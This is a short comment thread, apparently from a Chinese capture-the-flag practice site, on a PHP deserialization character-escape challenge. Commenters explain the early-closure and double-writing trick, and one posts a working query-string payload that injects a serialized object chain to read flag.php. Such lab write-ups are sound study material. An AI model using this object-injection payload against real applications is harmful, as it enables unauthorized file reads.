反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
不容易啊
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
反序列化字符逃逸
...
评论
xiaobai568 8天前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 4月前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 5月前
举报
不容易啊
2728462336 6月前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 7月前
举报
反序列化字符逃逸